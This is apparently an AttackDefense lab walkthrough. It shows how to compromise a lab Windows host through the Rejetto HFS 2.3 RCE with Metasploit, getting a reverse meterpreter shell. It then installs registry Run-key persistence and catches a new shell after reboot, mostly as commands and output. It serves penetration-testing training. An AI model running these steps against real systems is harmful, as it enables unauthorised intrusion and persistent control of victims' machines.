Name	Maintaining Access: Persistence Registry
URL	https://attackdefense.com/challengedetails?cid=2139
Туре	Windows Security: Maintaining Access

Important Note: This document illustrates all the important steps required to complete this lab. This is by no means a comprehensive step-by-step solution for this exercise. This is only provided as a reference to various commands needed to complete this exercise and for your further research on this topic. Also, note that the IP addresses and domain names might be different in your lab.

Step 1: Checking the target IP address.

Note: The target IP address is stored in the "target" file.

Command: cat /root/Desktop/target

```
root@attackdefense:~# cat /root/Desktop/target
Target IP Address : 10.0.17.103
root@attackdefense:~#
```

Step 2: Run a Nmap scan against the target IP.

Command: nmap 10.0.17.103

```
root@attackdefense:~# nmap 10.0.17.103
Starting Nmap 7.70 ( https://nmap.org ) at 2020-11-21 16:10 IST
Nmap scan report for 10.0.17.103
Host is up (0.0014s latency).
Not shown: 990 closed ports
PORT
         STATE SERVICE
80/tcp
         open http
135/tcp
         open msrpc
         open netbios-ssn
139/tcp
445/tcp
         open microsoft-ds
3389/tcp
         open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49163/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 18.66 seconds
root@attackdefense:~#
```

Step 3: We have discovered that multiple ports are open. We will run Nmap again to determine version information on port 80.

Command: nmap -sV -p 80 10.0.17.103

```
root@attackdefense:~# nmap -sV -p 80 10.0.17.103
Starting Nmap 7.70 ( https://nmap.org ) at 2020-11-21 16:14 IST
Nmap scan report for 10.0.17.103
Host is up (0.0015s latency).

PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.46 seconds
root@attackdefense:~#
```

Step 4: We will search the exploit module for hfs file server using searchsploit.

Command: searchsploit hfs

```
root@attackdefense:~# searchsploit hfs
 Exploit Title
Apple Mac OSX 10.4.8 - DMG H
                                + D0
                                          TRUNCATE Denial of Service
Apple Mac OSX 10.6 - HFS FileSystem (Denial of Service)
Apple Mac OSX 10.6.x - HFS Subsystem Information Disclo
                           S Subsystem Information Disclosure
Apple Mac OSX xnu 1228.x - 'hfs-fcntl' Kernel Privilege Escalation
       FTP/HTTP File Server 2.1.2 Remote Command Execution
Linux Kernel 2.6.x - Squash
                                Double-Free Denial of Service
Rejetto HTTP File Server (
                                ) - Remote Command Execution (Metasploit)
Rejetto HTTP File Server
                                  1.5/2.x - Multiple Vulnerabilities
Rejetto HTTP File Server
                                ) 2.2/2.3 - Arbitrary File Upload
Rejetto HTTP File Server
                                 2.3.x - Remote Command Execution (1)
Rejetto HTTP File Server (<mark>HFS</mark>
                               ) 2.3.x - Remote Command Execution (2)
Rejetto HTTP File Server (H
                               3) 2.3a/2.3b/2.3c - Remote Command Execution
Shellcodes: No Result
Papers: No Result
root@attackdefense:~#
```

Step 5: Rejetto HTTP File Server (HFS) 2.3 is vulnerable to RCE. Exploiting the target server using the Metasploit framework.

Commands:

msfconsole -q
use exploit/windows/http/rejetto_hfs_exec
set RHOSTS 10.0.17.103
set LHOST 10.10.1.2 <Make Sure to Enter Valid LHOST IP Address>
exploit

```
root@attackdefense:~# msfconsole -q
<u>msf6</u> > use exploit/windows/http/rejetto_hfs_exec
        No payload configured, defaulting to windows/meterpreter/reverse_tcp
                                                                                 ) > set RHOSTS 10.0.17.103
 msf6 exploit(
RHOSTS => 10.0.17.103
msf6 exploit(
                                                                                 c) > set LHOST 10.10.1.2
LHOST => 10.10.1.2
msf6 exploit(
                                                                              ec) > exploit
        Started reverse TCP handler on 10.10.1.2:4444
       Using URL: http://0.0.0.0:8080/dgJToc3FbM1fv
Local IP: http://10.10.1.2:8080/dgJToc3FbM1fv
        Server started.
        Sending a malicious request to /
| Sending a maticious request to /
| /usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
| /usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
| Payload request received: /dgJToc3FbM1fv
| Sending stage (175174 bytes) to 10.0.17.103
| Meterpreter session 1 opened (10.10.1.2:4444 -> 10.0.17.103:49189) at 2020-11-21 16:14:55 +0530
| Tried to delete %TEMP%\ZENcktWDzWdi.vbs, unknown result
        Server stopped.
```

We have successfully exploited the target vulnerable application (hfs) and received a meterpreter shell.

Step 6: Checking the current user.

Command: getuid

meterpreter >

```
meterpreter > getuid
Server username: WIN-OMCNBKR66MN\Administrator
meterpreter >
```

Step 7: We can observe that we are running as an administrator user. We are going to use Metasploit local exploit module for persistence access (exploit/windows/local/registry_persistence)

Windows Registry Only Persistence

"This module will install a payload that is executed during boot. It will be executed either at user logon or system startup via the registry value in "CurrentVersion\Run" (depending on privilege and selected method). The payload will be installed completely in registry."

Source: https://www.rapid7.com/db/modules/exploit/windows/local/registry_persistence/



Step 8: Running the registry persistence module to maintain access to the compromised machine.

Commands:

background use exploit/windows/local/registry_persistence set SESSION 1 exploit

Note: By default persistence, the local exploit module uses the following payload and local port for reverse connection.

Payload: windows/meterpreter/reverse_tcp

LHOST: Attack IP Address.

LPORT: 4444

```
meterpreter > background
    Backgrounding session 1...
msf6 exploit(xindows/http/rejetto_hfs_exer) > use exploit/windows/local/registry_persistence
    No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(xindows/local/registry_persistence) > set SESSION 1
SESSION => 1
msf6 exploit(windows/local/registry_persistence) > exploit

    Generating payload blob..
[+] Generated payload, 6060 bytes
    Root path is HKCU
    Installing payload blob..
[+] Created registry key HKCU\Software\bkj1N5Bw
[+] Installed payload blob to HKCU\Software\bkj1N5Bw\EVbydMqE
    Installing run key
[+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IleiKMMa
    Clean up Meterpreter RC file: /root/.msf4/logs/persistence/10.0.17.103_20201121.1541/10.0.17.103_20201121.1541.rc
msf6 exploit(xindows/local/registry_persistence) >
msf6 exploit(xindows/local/registry_persistence) >
```

Step 9: We have successfully maintained access. Start another msfconsole and run multi handler to re-gain access.

Commands:

msfconsole -q
use exploit/multi/handler
set LHOST 10.10.1.2
set PAYLOAD windows/meterpreter/reverse_tcp
set LPORT 4444
exploit

```
720 760
```

```
root@attackdefense:~# msfconsole -q
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.1.2
LHOST => 10.10.1.2
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > exploit
[**] Started reverse TCP handler on 10.10.1.2:4444
```

Step 10: Switch back to the active meterpreter session and reboot the machine.

Commands:

sessions -i 1 reboot

```
msf6 exploit(windows/local/registry_persistence) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > reboot
Rebooting...
[*] 10.0.17.103 - Meterpreter session 1 closed. Reason: Died
```

Once the machine reboots we would expect a new meterpreter session without re-exploitation. This happened because we have added a malicious registry entry for maintaining access.

```
root@attackdefense:~# msfconsole -q
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.1.2
LHOST => 10.10.1.2
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf6 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.1.2:4444
[*] Sending stage (175174 bytes) to 10.0.17.103
[*] Meterpreter session 1 opened (10.10.1.2:4444 -> 10.0.17.103:49166) at 2020-11-21 16:17:09 +0530
```

We have received a new meterpreter session.

References

meterpreter >

- 1. Rejetto HTTP File Server (HFS) 2.3.x Remote Command Execution (https://www.exploit-db.com/exploits/39161)
- 2. Metasploit Module (https://www.rapid7.com/db/modules/exploit/windows/http/rejetto_hfs_exec)
- Persistence Module
 (https://www.rapid7.com/db/modules/exploit/windows/local/registry_persistence/)